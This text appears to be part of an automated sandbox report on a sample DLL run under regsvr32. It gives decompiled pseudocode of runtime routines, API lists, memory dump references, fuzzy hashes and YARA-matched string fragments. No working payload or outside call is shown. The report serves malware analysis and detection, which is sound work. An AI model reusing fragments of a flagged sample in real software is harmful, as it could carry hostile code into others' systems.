                                                                                                                                                                                                                    				E000000011800086F4(__ecx - 0x2000, __rax);
                                                                                                                                                                                                                    				 *__rax = 9;
                                                                                                                                                                                                                    				E000000011800085B8();
                                                                                                                                                                                                                    				return 9;
                                                                                                                                                                                                                    			}



                                                                                                                                                                                                                    0x18000d26c
                                                                                                                                                                                                                    0x18000d271
                                                                                                                                                                                                                    0x18000d276
                                                                                                                                                                                                                    0x18000d289
                                                                                                                                                                                                                    0x18000d28b
                                                                                                                                                                                                                    0x18000d295
                                                                                                                                                                                                                    0x18000d297
                                                                                                                                                                                                                    0x18000d2b3

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                    • Opcode ID: b2bec9f1c83fd2e5dff941a4990122d97467662781677e8ba2cfdbb0e4efa737
                                                                                                                                                                                                                    • Instruction ID: 290c2a04846c9b039a5155463e3184fcb060a742c36b4207bfb39a2b49eb85f2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b2bec9f1c83fd2e5dff941a4990122d97467662781677e8ba2cfdbb0e4efa737
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3911AC3210468C82F383DF14E8507D9B7A4FB5C7C0F058426FA9547BAADF38CA199B50
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 444 180008714-180008723 445 180008733-180008743 444->445 446 180008725-180008731 444->446 448 18000875a-180008772 RtlAllocateHeap 445->448 446->445 447 180008776-180008781 call 1800086f4 446->447 453 180008783-180008788 447->453 449 180008774 448->449 450 180008745-18000874c call 18000c08c 448->450 449->453 450->447 456 18000874e-180008758 call 18000abf8 450->456 456->447 456->448
                                                                                                                                                                                                                    C-Code - Quality: 44%
                                                                                                                                                                                                                    			E00000001180008714(void* __eax, signed int __rcx, signed int __rdx) {
                                                                                                                                                                                                                    				void* __rbx;
                                                                                                                                                                                                                    				intOrPtr* _t22;
                                                                                                                                                                                                                    				signed int _t29;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t29 = __rdx;
                                                                                                                                                                                                                    				if (__rcx == 0) goto 0x80008733;
                                                                                                                                                                                                                    				_t1 = _t29 - 0x20; // -32
                                                                                                                                                                                                                    				_t22 = _t1;
                                                                                                                                                                                                                    				if (_t22 - __rdx < 0) goto 0x80008776;
                                                                                                                                                                                                                    				_t25 =  ==  ? _t22 : __rcx * __rdx;
                                                                                                                                                                                                                    				goto 0x8000875a;
                                                                                                                                                                                                                    				if (E0000000118000C08C() == 0) goto 0x80008776;
                                                                                                                                                                                                                    				if (E0000000118000ABF8(_t22,  ==  ? _t22 : __rcx * __rdx,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x80008776;
                                                                                                                                                                                                                    				RtlAllocateHeap(??, ??, ??); // executed
                                                                                                                                                                                                                    				if (_t22 == 0) goto 0x80008745;
                                                                                                                                                                                                                    				goto 0x80008783;
                                                                                                                                                                                                                    				E000000011800086F4(_t22, _t22);
                                                                                                                                                                                                                    				 *_t22 = 0xc;
                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                    			}






                                                                                                                                                                                                                    0x180008714
                                                                                                                                                                                                                    0x180008723
                                                                                                                                                                                                                    0x180008727
                                                                                                                                                                                                                    0x180008727
                                                                                                                                                                                                                    0x180008731
                                                                                                                                                                                                                    0x18000873f
                                                                                                                                                                                                                    0x180008743
                                                                                                                                                                                                                    0x18000874c
                                                                                                                                                                                                                    0x180008758
                                                                                                                                                                                                                    0x180008769
                                                                                                                                                                                                                    0x180008772
                                                                                                                                                                                                                    0x180008774
                                                                                                                                                                                                                    0x180008776
                                                                                                                                                                                                                    0x18000877b
                                                                                                                                                                                                                    0x180008788

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(?,?,00000000,0000000180007F92,?,?,00004C25B7ECA93E,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000), ref: 0000000180008769
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                    • Opcode ID: 7cf3c04cd0eb283655c87112c6735f3b789bd4b36bb41325690c7ae62c9b4c65
                                                                                                                                                                                                                    • Instruction ID: 66bea78d34406d615fa8c08e42eaa36a882f8058afe23dfc71e7ff7acb685faa
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7cf3c04cd0eb283655c87112c6735f3b789bd4b36bb41325690c7ae62c9b4c65
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A1F06D74309A0881FED7D7A599003D522D16F5CBC0F2CD4302D4E863DAEE1CC788A320
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    C-Code - Quality: 71%
                                                                                                                                                                                                                    			E00000001180001268(void* __ecx) {
                                                                                                                                                                                                                    				void* __rbx;
                                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                                    				void* _t17;
                                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t2 =  ==  ? 1 :  *0x80021ae0 & 0x000000ff;
                                                                                                                                                                                                                    				 *0x80021ae0 =  ==  ? 1 :  *0x80021ae0 & 0x000000ff;
                                                                                                                                                                                                                    				E00000001180001A80(1, _t12, __ecx, _t17, _t18, _t19, _t20, _t21);
                                                                                                                                                                                                                    				if (E00000001180002A08() != 0) goto 0x80001297;
                                                                                                                                                                                                                    				goto 0x800012ab; // executed
                                                                                                                                                                                                                    				E00000001180006CDC(_t17); // executed
                                                                                                                                                                                                                    				if (0 != 0) goto 0x800012a9;
                                                                                                                                                                                                                    				E00000001180002A58(0);
                                                                                                                                                                                                                    				goto 0x80001293;
                                                                                                                                                                                                                    				return 1;
                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                    0x18000127c
                                                                                                                                                                                                                    0x18000127f
                                                                                                                                                                                                                    0x180001285
                                                                                                                                                                                                                    0x180001291
                                                                                                                                                                                                                    0x180001295
                                                                                                                                                                                                                    0x180001297
                                                                                                                                                                                                                    0x18000129e
                                                                                                                                                                                                                    0x1800012a2
                                                                                                                                                                                                                    0x1800012a7
                                                                                                                                                                                                                    0x1800012b0

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 000000018000128A
                                                                                                                                                                                                                      • Part of subcall function 0000000180002A08: __vcrt_initialize_locks.LIBVCRUNTIME ref: 0000000180002A0C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: __scrt_dllmain_crt_thread_attach__vcrt_initialize_locks
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 108617051-0
                                                                                                                                                                                                                    • Opcode ID: b3a5aff99e9bbd50fc4b4caf8482eddb7f62de2f1dfabb963a32cf9525c58297
                                                                                                                                                                                                                    • Instruction ID: 3927130d99c38a55cbe47f9f4b507d4a3e007974ffcd633e9ac0bb37393e6b58
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3a5aff99e9bbd50fc4b4caf8482eddb7f62de2f1dfabb963a32cf9525c58297
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66E01A30B0528C8EFEE7E6B525423F937501B1E3C2F40D068B892825838D0947AD5722
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LoadString$ExitProcess
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 80118013-0
                                                                                                                                                                                                                    • Opcode ID: 4511720a80b85894ed9872a941f45ad7e5906891a0c13688ba3e14c3fa3ec101
                                                                                                                                                                                                                    • Instruction ID: b62d2fb12763fda2a64a5ee64e5548852d899a580494aacca0011f8ebade0f7c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4511720a80b85894ed9872a941f45ad7e5906891a0c13688ba3e14c3fa3ec101
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E1D0C936625A4892E7A29B61F80578A2390B78C7D4F809111A98C42A24CF2CC2098B00
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLastShowWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3252650109-0
                                                                                                                                                                                                                    • Opcode ID: 9a665b6fd1606399514c88e51871797ade4cb1dce934726ac272da09cbabfbb3
                                                                                                                                                                                                                    • Instruction ID: 20d447c0f35bcb8e3c3c297cfd2fae4a36a0868fd259666119818285c186e9df
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a665b6fd1606399514c88e51871797ade4cb1dce934726ac272da09cbabfbb3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B522B976B00E0986FBDB9F72AC1439B22A2AB8CBD5F46C439E40689174DE7DC75D8305
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3140674995-0
                                                                                                                                                                                                                    • Opcode ID: 1ffe1e744cccfe4686aba7d6a8aca853fc79a5f69e58afced9d2bc9442cc5b87
                                                                                                                                                                                                                    • Instruction ID: 43a781f402e08a9585d1bfd569913690a5560a40171371ec2054230cf506bc92
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ffe1e744cccfe4686aba7d6a8aca853fc79a5f69e58afced9d2bc9442cc5b87
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1931FB72605B848AEBA1DF60E8507EE7365F788785F44842AEB4E47A99DF38C74CC710
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 65%
                                                                                                                                                                                                                    			E000000011800082EC(void* __ecx, intOrPtr __edx, long long __rbx, long long __rsi) {
                                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                                    				int _t38;
                                                                                                                                                                                                                    				signed long long _t60;
                                                                                                                                                                                                                    				long long _t63;
                                                                                                                                                                                                                    				_Unknown_base(*)()* _t82;
                                                                                                                                                                                                                    				void* _t86;
                                                                                                                                                                                                                    				void* _t87;
                                                                                                                                                                                                                    				void* _t89;
                                                                                                                                                                                                                    				signed long long _t90;
                                                                                                                                                                                                                    				struct _EXCEPTION_POINTERS* _t95;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				 *((long long*)(_t89 + 0x10)) = __rbx;
                                                                                                                                                                                                                    				 *((long long*)(_t89 + 0x18)) = __rsi;
                                                                                                                                                                                                                    				_t87 = _t89 - 0x4f0;
                                                                                                                                                                                                                    				_t90 = _t89 - 0x5f0;
                                                                                                                                                                                                                    				_t60 =  *0x80021010; // 0x4c25b7eca93e
                                                                                                                                                                                                                    				 *(_t87 + 0x4e0) = _t60 ^ _t90;
                                                                                                                                                                                                                    				if (__ecx == 0xffffffff) goto 0x8000832b;
                                                                                                                                                                                                                    				E00000001180001C40(_t36);
                                                                                                                                                                                                                    				r8d = 0x98;
                                                                                                                                                                                                                    				E00000001180002680();
                                                                                                                                                                                                                    				r8d = 0x4d0;
                                                                                                                                                                                                                    				E00000001180002680();
                                                                                                                                                                                                                    				 *((long long*)(_t90 + 0x48)) = _t90 + 0x70;
                                                                                                                                                                                                                    				_t63 = _t87 + 0x10;
                                                                                                                                                                                                                    				 *((long long*)(_t90 + 0x50)) = _t63;
                                                                                                                                                                                                                    				__imp__RtlCaptureContext();
                                                                                                                                                                                                                    				r8d = 0;
                                                                                                                                                                                                                    				__imp__RtlLookupFunctionEntry();
                                                                                                                                                                                                                    				if (_t63 == 0) goto 0x800083be;
                                                                                                                                                                                                                    				 *(_t90 + 0x38) =  *(_t90 + 0x38) & 0x00000000;
                                                                                                                                                                                                                    				 *((long long*)(_t90 + 0x30)) = _t90 + 0x58;
                                                                                                                                                                                                                    				 *((long long*)(_t90 + 0x28)) = _t90 + 0x60;
                                                                                                                                                                                                                    				 *((long long*)(_t90 + 0x20)) = _t87 + 0x10;
                                                                                                                                                                                                                    				__imp__RtlVirtualUnwind();
                                                                                                                                                                                                                    				 *((long long*)(_t87 + 0x108)) =  *((intOrPtr*)(_t87 + 0x508));
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t90 + 0x70)) = __edx;
                                                                                                                                                                                                                    				 *((long long*)(_t87 + 0xa8)) = _t87 + 0x510;
                                                                                                                                                                                                                    				 *((long long*)(_t87 - 0x80)) =  *((intOrPtr*)(_t87 + 0x508));
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t90 + 0x74)) = r8d;
                                                                                                                                                                                                                    				_t38 = IsDebuggerPresent();
                                                                                                                                                                                                                    				SetUnhandledExceptionFilter(_t82, _t86);
                                                                                                                                                                                                                    				if (UnhandledExceptionFilter(_t95) != 0) goto 0x80008420;
                                                                                                                                                                                                                    				if (_t38 != 0) goto 0x80008420;
                                                                                                                                                                                                                    				if (__ecx == 0xffffffff) goto 0x80008420;
                                                                                                                                                                                                                    				return E000000011800010B0(E00000001180001C40(_t40), __ecx,  *(_t87 + 0x4e0) ^ _t90);
                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                    0x1800082ec
                                                                                                                                                                                                                    0x1800082f1
                                                                                                                                                                                                                    0x1800082fa
                                                                                                                                                                                                                    0x180008302
                                                                                                                                                                                                                    0x180008309
                                                                                                                                                                                                                    0x180008313
                                                                                                                                                                                                                    0x180008324
                                                                                                                                                                                                                    0x180008326
                                                                                                                                                                                                                    0x180008332
                                                                                                                                                                                                                    0x180008338
                                                                                                                                                                                                                    0x180008343
                                                                                                                                                                                                                    0x180008349
                                                                                                                                                                                                                    0x180008353
                                                                                                                                                                                                                    0x18000835c
                                                                                                                                                                                                                    0x180008360
                                                                                                                                                                                                                    0x180008365
                                                                                                                                                                                                                    0x18000837a
                                                                                                                                                                                                                    0x18000837d
                                                                                                                                                                                                                    0x180008386
                                                                                                                                                                                                                    0x180008388
                                                                                                                                                                                                                    0x18000839b
                                                                                                                                                                                                                    0x1800083a8
                                                                                                                                                                                                                    0x1800083b1
                                                                                                                                                                                                                    0x1800083b8
                                                                                                                                                                                                                    0x1800083c5
                                                                                                                                                                                                                    0x1800083d7
                                                                                                                                                                                                                    0x1800083db
                                                                                                                                                                                                                    0x1800083e9
                                                                                                                                                                                                                    0x1800083ed
                                                                                                                                                                                                                    0x1800083f1
                                                                                                                                                                                                                    0x1800083fb
                                                                                                                                                                                                                    0x18000840e
                                                                                                                                                                                                                    0x180008412
                                                                                                                                                                                                                    0x180008417
                                                                                                                                                                                                                    0x180008446

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1239891234-0
                                                                                                                                                                                                                    • Opcode ID: d0fc5085bf44c4937be082645d9f0fd030d92464e7166f1adeb9fe9a04ad5cc9
                                                                                                                                                                                                                    • Instruction ID: d6e40695d6015e5c843dff92317e70983bbd332ebd8c23179410134a75d63e3d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0fc5085bf44c4937be082645d9f0fd030d92464e7166f1adeb9fe9a04ad5cc9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E315032604F8486DBA1CF25E8407DE73A4F788798F544116FA9D43B59DF38C259CB00
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: G]W2$Uf$Wlw$X2D7$n
                                                                                                                                                                                                                    • API String ID: 0-182303197
                                                                                                                                                                                                                    • Opcode ID: 5ce9af85c0101b92db01bf743a5277ddb3699d4210e4094ad3775c6a215530db
                                                                                                                                                                                                                    • Instruction ID: 8572a2437699a4893536a58cfcc49895d3d9d0b368b407bff3799afac834358b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ce9af85c0101b92db01bf743a5277ddb3699d4210e4094ad3775c6a215530db
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C3121570A04709EFDB58DF68C08A99EBBF2FB48304F41816DE84AEB250D775DA19CB45
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: GK$M/uB$Q|-$~~K$Bt$
                                                                                                                                                                                                                    • API String ID: 0-557373213
                                                                                                                                                                                                                    • Opcode ID: 5399f6d2f4ddd76430553fcbb3a69801bb23c4fdd32863c07da465c7968e24a8
                                                                                                                                                                                                                    • Instruction ID: c265aaae4dc8c5818e4b3e7f3c72db60ff3ef7b05e326aaeab2345f1b71fb510
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5399f6d2f4ddd76430553fcbb3a69801bb23c4fdd32863c07da465c7968e24a8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23E1E0B550160CCBDB68DF38C0994D93BE1FB58308F611229FC6AA62A2DB78D915CF49
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: .I$gBfh$i[$w|${
                                                                                                                                                                                                                    • API String ID: 0-448909954
                                                                                                                                                                                                                    • Opcode ID: fd252399347da21463b78aeaa0d34fc6630a10d5928b5024a52fe33a2729c415
                                                                                                                                                                                                                    • Instruction ID: 85439fe310f79d92b346257c52baf710806d4bcb9901cbf970dffd4b6bbe4863
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd252399347da21463b78aeaa0d34fc6630a10d5928b5024a52fe33a2729c415
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C7B115709247499FCF88DFA9D8898DDBBF1FB48304F40921DE816AB250C778A945CF95
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: cp$vm$x$zu$Kn#
                                                                                                                                                                                                                    • API String ID: 0-3521309225
                                                                                                                                                                                                                    • Opcode ID: 854233274bfaeff89ac29a935d156dc1944753dcbd55c44e864b2476cdfcfe8d
                                                                                                                                                                                                                    • Instruction ID: 7a3320996c6915ebf35ee560ead3e321f1c6bdacaa44af760973146e50e74b51
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 854233274bfaeff89ac29a935d156dc1944753dcbd55c44e864b2476cdfcfe8d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2AA113B0D143198FDB48DFA8D8898EEBBF1FB48314F108219E855B7290D3789945CFA5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: #0FQ$0T$C;$lXjD$tS
                                                                                                                                                                                                                    • API String ID: 0-817034907
                                                                                                                                                                                                                    • Opcode ID: e4bf78acd7a5f6a30f384b9d32d43fdeffbe4641104b903a1cc162fefd21facd
                                                                                                                                                                                                                    • Instruction ID: ae010995ab06b63bc94953e220cae1edadf5de68e31a1f9b33399068569b7cab
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4bf78acd7a5f6a30f384b9d32d43fdeffbe4641104b903a1cc162fefd21facd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB4192B180034E8FDB44DFA4D88A4CE7FF0FB68398F215619E859A6250D3B89694CFD5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: ,$3T$D-$Rc$l
                                                                                                                                                                                                                    • API String ID: 0-617906138
                                                                                                                                                                                                                    • Opcode ID: 3a3cf95294224deb7faeda9f3e638283c88744c906ce2ff68bf076d4943cea68
